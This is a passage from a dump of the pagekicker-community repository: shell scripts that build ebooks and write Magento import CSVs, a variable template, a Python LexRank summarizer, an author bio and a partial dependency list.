\"Enabled,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# taxable class\necho -n \"None,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# catalog visibility\n\necho -n '\"Catalog, Search\",' >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# enable google checkout\n\necho -n \"Yes,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n#links purchased separately\n\necho -n \"1,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n#quantity\n\necho -n \"1,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n#minimum quantity\n\necho -n \"1,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# use configured minimum quantity\necho -n \"1,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n#is the quantity decimal?\n\necho -n \"0,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# will backorders be accepted\n\necho -n \"0,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# use configuration for backorders?\n\necho -n \"1,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n#what is the minimum sale quantity?\necho -n \"1,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n#use configured value for min sale qty?\necho -n \"1,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n#what is the maximum sale quantity?\n\necho -n \"0,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# use configured value for maximum sale quantity?\n\necho -n \"1,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# is the product in stock?\n\necho -n \"0,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# is there a low stock date?\n\necho -n \"0,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# should we notify on given stock quantity\n\necho -n \"0,\" >> $metadatatargetpath$uuid/\"current-import.csv\"\n\n# use configuration value on notifying stock quantity\n\necho -n \"1,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# manage the stock?\n\necho -n \"0,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# use configuration value for managing stock?\n\necho -n \"1,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# should the stock status be changed automatically\n\necho -n \"1,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# what is the product name\n\necho -n $escapeseed \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# is there a special store id\n\necho -n \"'$specialstoreid',\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n \n# what is the product type id?\n\necho -n \"downloadable,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# has the product status changed?\n\necho -n \"0,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# what is the value of product_changed_websites\n\necho -n \"0,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# tier prices\necho -n \"0,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n#associated products\n\necho -n \"0,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n#adwords grouped \n\necho -n \"0,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# weight\n\necho -n \"0,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n#downloadable options\n\n# note that file path is relative to media/import because that's where Magento (not SFB) assumes the file will be\n\n\nif [ \"$targetformats\" = \"epubonly\" ] ; then\n\t\n\techo \"targetformats is\" $targetformats\n\n\techo $epublinkname \n\n\techo -n '\"'$epublinkname,0,9,file,$uuid/$sku'plaintxt.epub,''\"' >> $metadatatargetpath$uuid\"/current-import.csv\"\n\nelse\n\n\techo -n '\"'$epublinkrichname,0,9,file,$uuid/$sku'linkrich.epub'$pipe$docxname,0,9,file,$uuid/$sku'.docx'$pipe$epublinkname,0,9,file,$uuid/$sku'plaintxt.epub'$pipe$mobilinkname,0,9,file,$uuid/$sku'.mobi'$pipe$pdflinkname,0,9,file,$uuid/\"$sku\"print_color.pdf'\"', >> $metadatatargetpath$uuid\"/current-import.csv\"\n\nfi\n \n\n# echo additional columns\n\n#echo -n $special_price\",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n#echo -n $special_from_date\",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n#echo -n $special_to_date\",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\necho -n '\"' >> $metadatatargetpath$uuid\"/current-import.csv\"\n\necho -n $editedby '\",' >> $metadatatargetpath$uuid\"/current-import.csv\"\n\necho -n '\"' >> $metadatatargetpath$uuid\"/current-import.csv\"\n\necho -n $seedsource '\",' >> $metadatatargetpath$uuid\"/current-import.csv\"\n\necho -n $news_from_date >> $metadatatargetpath$uuid\"/current-import.csv\"\n\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\necho -n $news_to_date >> $metadatatargetpath$uuid\"/current-import.csv\"\n\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\necho -n $editorid >> $metadatatargetpath$uuid\"/current-import.csv\"\n\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\necho -n '\"' >> $metadatatargetpath$uuid\"/current-import.csv\"\n\necho -n $wordcount >> $metadatatargetpath$uuid\"/current-import.csv\"\n\necho -n '\"' >> $metadatatargetpath$uuid\"/current-import.csv\"\n\necho \",,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n#product tags were here\n\n# . includes/keyword-reader\n\n\necho \"finished writing metadata for this book \"$booktype\" on \" $seed | tee --append $sfb_log\n\necho \"SKU was \"$sku | tee --append $sfb_log\n\necho \"wrote metadata to \"$metadatatargetpath$uuid\"/current-import.csv\" | tee --append $sfb_log\n\n\n" }, { "alpha_fraction": 0.6766610145568848, "alphanum_fraction": 0.6862010359764099, "avg_line_length": 30.52688217163086, "blob_id": "6c48f4422db528acf3ce598c703a5b85db287c53", "content_id": "768893ef9ee773f493207f87eb01324262d10993", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 2935, "license_type": "permissive", "max_line_length": 404, "num_lines": 93, "path": "/scripts/bin/build_n_books_from_csv.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n# loops over csv metadata file with n data rows to build n books \n\n# initialize variables\n\n# needs $1 = path to data file $2 number of rows \n\nif [ ! -f \"$HOME\"/.pagekicker/config.txt ]; then\n\techo \"config file not found, creating /home/<user>/.pagekicker, put config file there\"\n\tmkdir -p -m 755 \"$HOME\"/.pagekicker\n\techo \"exiting\"\n\texit 1\nelse\n\t. \"$HOME\"/.pagekicker/config.txt\n\techo \"read config file from $HOME\"\"/.pagekicker/config.txt\"\nfi\n\n. includes/set-variables.sh\nif [ ! \"/tmp/pagekicker/buildresult\" ] ; then\n\trm /tmp/pagekicker/buildresult\nelse\n\ttrue\nfi\n\n\n#create batch uuid\n\necho \"creating batch_uuid\"\nbatch_uuid=$(\"$PYTHON_BIN\" -c 'import uuid; print(uuid.uuid1())')\nbatch_uuid=\"batch_\"\"$batch_uuid\"\necho \"batch_uuid is\" $batch_uuid | tee --append $xform_log\nmkdir -p -m 777 $TMPDIR$batch_uuid\n\necho \"abt to enter main loop\"\nrow_no=$2\n# main read & build loop\ni=1\necho \"number of rows to parse is $row_no\"\nwhile [[ \"$i\" -le $row_no ]]; do\n\tuuid=$(\"$PYTHON_BIN\" -c 'import uuid; print(uuid.uuid1())')\n\tmkdir -p -m 777 $TMPDIR$uuid\n\tmkdir -p -m 777 $TMPDIR$uuid/seeds\n\tmkdir -p -m 777 $TMPDIR$uuid/csv\n\n\t\"$PYTHON_BIN\" $scriptpath\"bin/csvreader.py\" \"$1\" \"$uuid\" $i\n\n\techo \"getting ready to run catalog entry creation command for row $row_no\"\n\t#catid=$(cat $TMPDIR$uuid/csv/row.catid)\n\tbooktitle=$(cat $TMPDIR$uuid/csv/row.booktitle)\n\teditedby=$(cat $TMPDIR$uuid/csv/row.editedby)\n\t#jobprofile=$(cat $TMPDIR$uuid/csv/row.jobprofile)\n\tseeds=$(cat $TMPDIR$uuid/csv/row.seeds)\n\timprint=$(cat $TMPDIR$uuid/csv/row.imprint)\n\t#echo '\"' > $TMPDIR$uuid/csv/row.add_this_content\n\tadd_this_content=$(cat $TMPDIR$uuid/csv/row.add_this_content)\n\t# add_this_content='\"'$add_this_content'\"'\n\t#echo '\"' >> $TMPDIR$uuid/csv/row.add_this_content\n\techo \"add_this_content is $add_this_content\"\n\t#price=$(cat $TMPDIR$uuid/csv/row.price)\n\techo \"booktitle is $booktitle and editedby is $editedby\"\n\techo \"seeds are:\"\n\techo \"$seeds\"\n\tsed -e 's/\\^/\\n/g' $TMPDIR$uuid/csv/row.seeds > $TMPDIR$uuid/csv/seeds\n\n\n\n\tif [ \"$2\" = \"ccc_off\" ] ; then\n\t\techo \"not running ccc\"\n\telse\n\t\tbin/create-catalog-entry.sh --format \"csv\" --passuuid \"$uuid\" --booktitle \"$booktitle\" --booktype \"Reader\" --covercolor \"Random\" --coverfont \"Minion\" --environment \"$environment\" --jobprofilename \"default\" --seedfile \"$TMPDIR$uuid/csv/seeds\" --builder \"yes\" --imprint \"$imprint\" --batch_uuid \"$batch_uuid\" --editedby \"$editedby\" --yourname \"no\" --summary \"both\" --add_this_content \"$add_this_content\"\n \n#--categories \"$catid\" not implemented\n# --book_description \"$description\" ditto\n\tfi\n\techo \"exit value is $?\"\n\tif [ \"$?\" -eq 0 ] ; then \n\t\ttrue\n\telse\n\t\techo \"exiting with error\"\n\t\texit 1\n\tfi\n\n\ti=$(( i + 1 ))\n\techo \"i is $i\"\n\ndone\n\nzip $TMPDIR$batch_uuid/batch $TMPDIR$batch_uuid/*.epub $TMPDIR$batch_uuid/*.mobi $TMPDIR$batch_uuid/*.docx\necho \"zipped all deliverables in $TMPDIR$batch_uuid/batch.zip\"\necho \"completed building $row_no new titles\"\n\nexit 0\n\n\n\n" }, { "alpha_fraction": 0.7275421619415283, "alphanum_fraction": 0.7492020130157471, "avg_line_length": 22.70810890197754, "blob_id": "db09008755fb1c5f487ebb6dc9387511c91739e4", "content_id": "5943fde41b9a3eb8c92451675f33f0418d0aa6c2", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 4386, "license_type": "permissive", "max_line_length": 161, "num_lines": 185, "path": "/scripts/includes/set-variables-template.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "abstracts=\"both\"\nadd_corpora=\"no\"\nadd_imprint_biblio=\"yes\"\nadd_this_content_part_name=\"User-Provided Content\"\nadd_this_content=\"none\"\nafterKWIC=\"5\"\nanalyze_url=\"no\"\nangbr=\"<\"\narxiv=\"no\"\nattribute_set=\"Default\"\nauthorphoto=\"authorphoto.png\"\nbackmatter=\"on\"\nbeforeKWIC=\"3\"\nBISAC_code=\"None\"\nbody=\"<body>\"\nbold=\"<b>\"\nbooktitle=\"\"\nbooktype=\"Reader\"\nbooktypewebformid='\"/item/booktype\"'\nbreaking=\"no\"\nbuild_all_formats=\"yes\"\nbuild_bw_pdf=\"yes\"\nbuild_color_pdf=\"yes\"\nbuild_docx=\"no\"\nbuild_linkrich_epub=\"yes\"\nbuild_mobi=\"yes\"\nbuild_text_epub=\"yes\"\nbuild_txt_html_only=\"no\"\nbuilder=\"yes\"\nbuildtarget=\"$mediatargetpath\"\ncategories=\"4\"\ncategoryid=2\ncloseparen=\")\"\ncover_image_extension=\".png\"\ncoverbase=\"images/bottomcanvas.png\"\ncovercolor=\"black\"\ncoverfile=\"assets/NCP-cover.jpg\"\ncoverfont=\"Georgia\"\ncoverfontcolor=\"white\"\ncoverRGB=\"0,0,0\"\ncovertype_id=\"1\"\ncustomer_email=\"[email protected]\" # chsnge to your organization\ncustomeridwebformid='\"/item/customerid\"'\ncustomtitle=\"none\"\ndaily_email_post_to_wp=\"no\"\ndaily_email_post_to_wp_status=\"draft\"\ndedicationfilename=\"default.html\"\ndedicationfilename=\"default.html\"\ndescription=\"test\"\ndocsandabstracts=\"'<b>Document titles and abstracts:</b><p>'\"\ndocxlinkname=\"Microsoft_Word_docx\"\ndocxname=\"Microsoft_Word_docx\"\ndontcleanupseeds=\"yes\"\ndq='\"'\nebookformat=\"epub\"\nebookintro=\"includes/ebook.intro.html\"\neditedby=\"PageKicker\" # chsnge to your default author\neditorid=\"1\"\nendanchor=\"/a>\"\nendbody=\"</body>\"\nendbold=\"</b>\"\nendbr=\">\"\nendhead=\"</endhead>\"\nendhtml=\"</html>\"\nendp=\"</p>\"\nendurl=\"&prop=links&pllimit=500&format=xml\"\nepub=\".epub\"xmlstarletwebformstart=\"xmlstarlet sel -t -v\"\nepublinkname=\"ePub\"\nepublinkrichname=\"Pub\"\nexemplar_file=\"none\"\nexemplar_filedir_code=400 # this is the field code value used in the directory structure where magento webforms stores uploaded exemplar files -- softcoded below\nexpand_seeds_to_pages=\"no\"\nfb_announcement=\"no\"\nfetcharray=()\nfetched_document_format=\"html\"\nfetchfile=\"fetch/fetchlist.csv\"\nfirstname=\"\"\nfleet=\"yes\"\nflickr=\"no\"\nflickr=\"off\"\nfrontmatter=\"on\"\ngoogler_on=\"no\"\ngoogler_news_on=\"no\"\nh1=$angbr\"h1\"$endbr\nh1end=$angbr$slash\"h1\"$endbr\nh2=$angbr\"h2\"$endbr\nh2end=$angbr$slash\"h2\"$endr\nh3=$angbr\"h3\"$endbr\nh3end=$angbr$slash\"h3\"$endbr\nhead=\"<head>\"\nhtml=\"<html>\"\nhttpvalidate='(https?|ftp|file)://[-A-Za-z0-9\\+&@#/%?=~_|!:,.;]*[-A-Za-z0-9\\+&@#/%=~_|]'\nimgsrc=\"<IMG SRC=\"\nimport=\"no\"\nimprint=\"pagekicker\" # overridden by --imprint parameter at cli\nISBN_assign_automatically=\"no\"\nISBN_owner=\"0\"\nISBN=\"012345679X\"\njobprofilename=\"default\"\nlastname=\"\"\nLSI_import=\"yes\"\nmailtofred=\"yes\"\nmaximages=\"4\" #default\nmiddlename=\"\"\nmobilinkname=\"Kindle\"\nmontageur=\"off\"\nmontageurdir=\"montageur\"\nmylibrary=\"yes\"\nnameprefix=\"\"\nnegative_seed_weight=1\nnegative_seeds=\"\"\nnewline=\"/n\"\nnews_lasts_minutes=\"43200\"\nnews_to_buffer=\"2592000\"\non=\" on \"\nopenanchor=\"<a href=\"$dq\nopenparen=\"(\"\noutfile=\"montage.jpg\"\np=\"<p>\"\npass_uuid=\"no\"\npdflinkname=\"PDF\"\npdfserif=\"MinionWebPro\"\npipe=\"|\"\npositive_seed_weight=1\npositive_seeds=\"\"\nprice=0.99\nprintconfigfile=\"yes\"\nrefresh=\"yes\"\nrobot_location=\"Ann Arbor, Michigan, USA\" # change to your location\nrobot_summary_length=10\nrows=1\nsample_tweets=\"no\"\nscreen_numbered_seeds=\"no\"\nseedfile=\"\"\nseedfortheday=\"\"\nseedsource=\"PageKicker\"\nSEOmodule_status=\"off\"\nseriesdescriptionfilename=\"default.html\"\nshortform=\"no\"\nsingleseed=\"\"\nsingleseedwebformid='\"/item/singleseed\"'\nsku=`tail -1 < \"$LOCAL_DATA\"\"SKUs/sku_list\"`\nslash=\"/\"\nslidebodyfont=\"DejaVu-Sans\" #Decimator\nspecial_lasts_minutes=\"43200\"\nspecial_price=\"0\"\nspecial_to_buffer=\"2592000\"\nspecialstoreid=\"0\"\nsq=\"'\"\nstatus=\"Enabled\"\nstopimagefolder=\"none\" #default\nstorecode=\"admin\"\nstoreids=\"0\"\nsubtitle=\"\"\nsummarizer_ngram_threshold=2\nsummarizer_on=Y\nsummary_length=10\nsummary=\"both\"\ntext_extraction_on=\"yes\"\nthumbxsize=120 #default\nthumbysize=120 #default\ntldr=\"\"\ntop_q=\"20\" # number of nerv lines used divided by 2\ntoplabelfont=\"Utopia\" # #Decimator must be available font\ntoplabelfontname=\"Utopia\" #Decimator\ntxtformatname=\".txt\"\ntxtwildcard=\"*.txt\"\ntwitter_announcement=\"no\"\ntwo1=\"no\"\ntype=\"downloadable\"\nuserdatadir=\"none\"\nuserdescription=\"no\"\nuserid=\"1\"\nuserlogo=\"assets/imprint.png\"\nverbose=\"no\"\nvisibility=\"Catalog,Search\"\nwebsites=\"base\"\nwikilocale=\"en\"\nwordcount=0\nwordcountpages=0\nwordcountsummaries=0\nx=\"x\" # for imagemagick scripts\nxmlstarletwebformstart=\"xmlstarlet sel -t -v\"\nxpathwebformid='\"/item/webform_id\"'\nyourname=\"no\"\n" }, { "alpha_fraction": 0.5987081527709961, "alphanum_fraction": 0.6056222915649414, "avg_line_length": 37.84098815917969, "blob_id": "fb87898fb7ae0d3939aefc6f6b1bc33aa9187f37", "content_id": "4b8bd72e7eab45727039f9a8082090f3fe7823a5", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10992, "license_type": "permissive", "max_line_length": 147, "num_lines": 283, "path": "/scripts_python_3/bin/PKsum-clean.py", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/usr/local/bin/python\n###################################################\n#\n# PKsumv6.py\n# Goal: implement biased LexRank for either single docs or a multi doc corpus\n# called as python PKsumv3.py text_path_or_file\n# By Jeffrey Herbstman, 7-15-2013\n#\n# Inputs:\n# path - text file or directory containing text files\n# output - output file name\n# optional inputs:\n# posseed - seed string for positively biased LexRank\n# negseed - seed string for negatively biased LexRank\n# stopfile - file containing custom stopwords\n# length - int - length (in lines) of summary\n# seed_posweight - weights the positive seed similarity score\n# seed_negweight - weights the negative seed similarity score\n# ngrams - allows ngram measurements\n#\n# Outputs:\n# single file with name provided as input (see above)\n#\n#Options to possibly add:\n# - normalization: right now the cosine similarity measure incorporates a\n#normalization method. I'm not sure how to sub in a different, still effective\n#method instead of that\n# - Stemming\n#\n###################################################\nimport scipy, numpy, codecs, os\nimport sys, nltk, collections, sklearn.feature_extraction.text, networkx, time\nimport scipy.spatial.distance\nimport biased_lexrank\nimport argparse\n\n\n#==================================================\n#defines a class consisting of a list of sentences pulled from the text doc\nclass Corpus:\n def __init__(self, input_text):\n self.documents = self._index_docs(input_text)\n\n def ls(self, path):\n return [os.path.join(path, item) for item in os.listdir(path)]\n\n def file_read(self, input_text):\n with open(input_text, encoding='utf-8', errors='replace') as docfile:\n doc = docfile.read()\n\n #Sentence tokenizing\n doc = ' '.join(doc.strip().split('\\n'))\n sentence_tokenizer = nltk.PunktSentenceTokenizer()\n sentences = sentence_tokenizer.tokenize(doc)\n return sentences\n\n def _index_docs(self, input_text):\n sentences = []\n try:\n sentences = self.file_read(input_text)\n except IOError:\n for f in self.ls(input_text):\n single_doc_sentences = []\n single_doc_sentences = self.file_read(f)\n sentences.extend(single_doc_sentences)\n\n #removes arbitrarily long lists\n sentences = [sent for sent in sentences if sent.count(',') < 12]\n\n return sentences\n\n\n\n#==================================================\n#creates a Term-Document Matrix for the corpus\nclass TDM:\n def __init__(self, corpus, posseed, negseed, stopfile, norm_flag, ngram):\n\n #Normalization flag encoding\n if norm_flag == 'True':\n norm_opt = 'l2'\n else:\n norm_opt = None\n\n #Stopword encoding\n if stopfile == None:\n stop_words = 'english'\n else:\n with codecs.open(stopfile, encoding='utf-8') as f:\n stop_words = f.read()\n\n if posseed == None and negseed == None:\n self.matrix = self._gen_matrix(corpus, stop_words, norm_opt, ngram)\n else:\n self.matrix = self._gen_matrix_seeded(corpus, posseed, negseed, stop_words, norm_opt, ngram)\n\n\n\n def _gen_matrix(self, corpus, stop_words, norm_opt, ngram):\n\n #TDM generator\n count_vec = sklearn.feature_extraction.text.CountVectorizer(\n stop_words, ngram_range=(1, ngram))\n try:\n term_matrix = count_vec.fit_transform(corpus)\n except ValueError:\n print(\"This document isn't summarizable.\")\n sys.exit()\n normalized = sklearn.feature_extraction.text.TfidfTransformer(norm=norm_opt).fit_transform(term_matrix)\n return term_matrix, normalized\n\n def _gen_matrix_seeded(self, corpus, posseed, negseed, stop_words, norm_opt, ngram ):\n #This adds the seed so that it can be properly indexed for later\n #comparison with the TDM\n corpus.insert(0, negseed)\n corpus.insert(0, posseed)\n count_vec = sklearn.feature_extraction.text.CountVectorizer(\n stop_words, ngram_range=(1, ngram) )\n try:\n term_matrix = count_vec.fit_transform(corpus)\n except ValueError:\n print(\"This document isn't summarizable.\")\n sys.exit()\n term_matrix_seedless = term_matrix.tocsr()[2:,:]\n pos_seed_vector = term_matrix.getrow(0)\n neg_seed_vector = term_matrix.getrow(1)\n\n #if you want to use normalization\n normalized = sklearn.feature_extraction.text.TfidfTransformer(norm=norm_opt).fit_transform(term_matrix_seedless)\n\n return term_matrix_seedless, normalized, pos_seed_vector, neg_seed_vector\n\n#==================================================\ndef baseline_scorer(term_matrix, seed_vector):\n #need to compute some measure of similarity between seed vector and matrix\n #could use improved vectorization?\n numerator = term_matrix*seed_vector.T\n seed_norm = numpy.sum(numpy.abs(seed_vector.data)**2)**(1./2)\n term_matrix.data = term_matrix.data**2\n matr_norm = numpy.sqrt(term_matrix.sum(1))\n m = matr_norm.shape[0]\n baseline_score = scipy.zeros(m)\n\n for n in range(m):\n if matr_norm[n] != 0:\n baseline_score[n] = numerator[n].multiply(1/(seed_norm*matr_norm[n]))\n baseline_score = baseline_score/baseline_score.sum()\n return baseline_score\n\n\n#==================================================\nclass Graph:\n def __init__(self, term_matrix, LR_method, pos_seed_vector, neg_seed_vector, pos_weight, neg_weight):\n #Can add option for different similarity measures here\n self.sim_scores = self._gen_sim_scores(term_matrix, LR_method, pos_seed_vector, neg_seed_vector, pos_weight, neg_weight)\n\n\n def _gen_sim_scores(self, term_matrix, LR_method, pos_seed_vector, neg_seed_vector, pos_weight, neg_weight):\n if LR_method == 'unbiased':\n #Switch from distance to similarity measures here\n weights = -1*(scipy.spatial.distance.pdist(term_matrix.toarray(), 'cosine')-1)\n #check weights here and threshold them\n weights[weights < .2] = 0\n weights[numpy.isnan(weights)] = 0\n\n graph = networkx.from_numpy_matrix(scipy.spatial.distance.squareform(weights))\n scores = networkx.pagerank_scipy(graph, max_iter=5000, alpha = .85)\n\n\n elif LR_method == 'biased':\n weights = -1*(scipy.spatial.distance.pdist(term_matrix.toarray(), 'cosine')-1)\n #check weights here and threshold them\n weights[weights < .2] = 0\n nan2zero(weights)\n\n graph = networkx.from_numpy_matrix(scipy.spatial.distance.squareform(weights))\n\n\n #check if seed is empty and return something with correct format\n if str(pos_seed_vector.nonzero()) == '(array([], dtype=int32), array([], dtype=int32))':\n pos_seed_scores = scipy.zeros_like(neg_seed_vector)\n else:\n pos_seed_scores = baseline_scorer(term_matrix, pos_seed_vector)\n\n\n if str(neg_seed_vector.nonzero()) == '(array([], dtype=int32), array([], dtype=int32))':\n neg_seed_scores = scipy.zeros_like(pos_seed_scores)\n else:\n neg_seed_scores = baseline_scorer(term_matrix, neg_seed_vector)\n\n #add a ballast to act against neg seed scores\n ballast = scipy.zeros_like(neg_seed_scores)\n ballast[neg_seed_scores == 0] = neg_weight\n\n seed_scores = pos_seed_scores*pos_weight + neg_seed_scores*neg_weight +ballast\n scores = biased_lexrank.b_lexrank(graph, seed_scores, personalization = 'biased', alpha=.85, max_iter = 5000, seed_weight = pos_weight)\n\n return scores\n\n#=================================================\ndef nan2zero(array):\n array[numpy.isnan(array)] = 0\n\n#=================================================\n\ndef print_summary(sentences, scores, out_file, length):\n ranked_sentences = sorted(((scores[i], s, i) for i,s in enumerate(sentences)), reverse = True)\n\n top_ranked = ranked_sentences[0:length]\n\n f = codecs.open(out_file, encoding = 'utf-8', mode = 'w')\n sorted_sum = sorted(top_ranked, key = lambda top_ranked: top_ranked[2])\n for element in sorted_sum:\n f.write(element[1] + '\\n\\n')\n p = (element[1] + '\\n\\n')\n print(p)\n f.close()\n\n#=================================================\ndef output_checker(output_file):\n if output_file == None:\n print(\"Output file name not supplied. Please run again with -o option supplied\")\n from sys import exit\n exit()\n\n#=================================================\n\ndef main():\n\n\n parser = argparse.ArgumentParser()\n parser.add_argument('path', help = \"target file or directory for summarization\")\n parser.add_argument(\"--posseed\", help=\"boosting seed for biased LexRank\", default = None)\n parser.add_argument(\"--negseed\", help=\"blocking seed for biased LexRank\", default = None)\n parser.add_argument(\"--stopfile\", help=\"file containing custom stopwords\")\n parser.add_argument(\"-o\", \"--output\", help = \"output file name\")\n parser.add_argument(\"-l\", \"--length\", help = \"summary length in lines\", default = 10)\n parser.add_argument(\"--seed_posweight\", help = \"Weight for positive seed\", default = 3)\n parser.add_argument(\"--seed_negweight\", help = \"Weight for negative seed\", default = .0001)\n parser.add_argument(\"--ngrams\", help = \"N-gram number\", default = 1)\n #normalization doesn't work due to being inherent within scoring method\n parser.add_argument(\"-n\", \"--is_norm\", help = \"Boolean flag for normalization\", default = True)\n args = parser.parse_args()\n\n input_text = args.path\n pos_seed = args.posseed\n neg_seed = args.negseed\n stopfile = args.stopfile\n out_file = args.output\n sum_length = int(args.length)\n norm_flag = args.is_norm\n pos_weight = float(args.seed_posweight)\n neg_weight = float(args.seed_negweight)\n ngram = int(args.ngrams)\n corpus = Corpus(input_text).documents\n\n output_checker(out_file)\n\n if pos_seed == None and neg_seed == None:\n LR_method = 'unbiased'\n #print(LR_method)\n [term_matrix, normalized] = TDM(corpus, pos_seed, neg_seed, stopfile, norm_flag, ngram).matrix\n pos_seed_vector = []\n neg_seed_vector = []\n\n else:\n LR_method = 'biased'\n if pos_seed == None:\n pos_seed = ''\n if neg_seed == None:\n neg_seed = ''\n\n [term_matrix, normalized, pos_seed_vector, neg_seed_vector] = TDM(corpus, pos_seed, neg_seed, stopfile, norm_flag, ngram).matrix\n corpus = corpus[2:]\n\n\n scores = Graph(normalized, LR_method, pos_seed_vector, neg_seed_vector, pos_weight, neg_weight).sim_scores\n print_summary(corpus, scores, out_file, sum_length)\n\n\n#=================================================\nif __name__ == '__main__':\n main()\n" }, { "alpha_fraction": 0.814828097820282, "alphanum_fraction": 0.8176934123039246, "avg_line_length": 95.24137878417969, "blob_id": "9effa0c391dfdd154d75018e1739f1f53c9aa406", "content_id": "d8ab44e17e46983fdc95af9ec9a552f3d604aa4d", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2816, "license_type": "permissive", "max_line_length": 452, "num_lines": 29, "path": "/conf/jobprofiles/authorbios/Brendan_Harkin.md", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "Brendan Harkin founded X Media Lab in June 2003. X Media Lab is the internationally acclaimed creative thinktank for digital media professionals that brings together the world's outstanding creatives, executives, and power-brokers who work as mentors with local companies on their own creative project ideas.\n\nX Media Lab focuses on creating high-value networks among the emergent digital media markets of China, India, the Middle East, and North and South Asia; and assisting local companies get their ideas successfully to market by involving them directly with the world's leading digital media practitioners.\n\nBrendan has held a number of high profile positions in new media industry development: founding the first Asia Pacific Multimedia Festival; and as Australia's first General Manager for Public Awareness at the National Office for the Information Economy (NOIE) and was awarded an “Australia Day National Gold Medal” by the Australian Government for his services.\n\nBrendan's most recent honours include:\n\n - Appointed to the Advisory Council of the College of Fine Arts, University of NSW Awarded the 5th China Creative Industries Award for \"International Contribution\"\n\n - International Jury Member for the Interactive Emmy Awards held at MIPTV in Cannes\n\n - Appointed “Foreign Expert Advisor” to the Beijing municipal government on Digital Media industry development\n\n - Appointed Visiting Professor to Beijing Culture and Language University\n\n - Consultant to the Suzhou Industrial Park on Animation industry development\n\n - Named as one of the “Top Ten Most Influential People” in the Australian Digital Media industries\n\n - Named as one of the “50 Most Influential Australians in Asia” by the NY-based Advance Organization\n\n - Panellist at the 4th Al Jazeera Media Summit in Doha\n\n - In the past year he has been an invited international speaker at many creative industries events around China including the ICCIE Summit in Beijing, the inaugural \"Academic Alliance of International Cultural Industries\" at the Communications University Beijing, the Animation Summit in Xi’an, the Creative Industries Forums at Foshan, Shangdong, Wuhu and Shenyang, the Games Forum in Zhonghsan, and the Creative Industries Festival Week in Shanghai.\n\nBrendan combines his involvement in the Digital Media industries with an academic background in philosophy, and was awarded a Doctoral Scholarship by the University of Melbourne where he studied ‘Philosophy and Technology'.\n\nHe has consulted to the United Nations Committee on Trade and Development (UNCTAD), the European Union’s EUROPRIX initiative, most of Australia’s leading creative industries and media agencies; and has served as an Advisory Board Member to a large number of digital media, cultural, and technology events throughout Asia.\n" }, { "alpha_fraction": 0.7642792463302612, "alphanum_fraction": 0.7805983424186707, "avg_line_length": 32.42424392700195, "blob_id": "9fbe0c306f998bb5d0b9adc0741d3ed4efae8ec2", "content_id": "bf845e856049697ea08fb9eb943feb4f34ebd5fc", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1103, "license_type": "permissive", "max_line_length": 257, "num_lines": 33, "path": "/docs/dependencies.md", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "Dependencies\n\nPython 2.7 *and* Python 3.5.2 (some helper programs use one or the other)\n\npython libraries: see requirements.txt\n\ngoogler https://github.com/jarun/googler.git\n\nphp (for Magento -- should be installed with Magento stack)\n\nimagemagick 6.8.9 or more\nsendemail # note middle \"e\", this is lightweight version that is very portable\n # sendemail has issue with TLS/SSL in Ubuntu 14.04, needs to be fixed\n\npandoc 2+ \n\npdftk, fdupes, pdfimages # for montageur.sh\n\nIBM word cloud (IBMcloud)\nAPI keys for fetchers (minimum: see Wikimedia https://www.mediawiki.org/wiki/API:Login)\n\nFonts:\n\nwordcloud needs 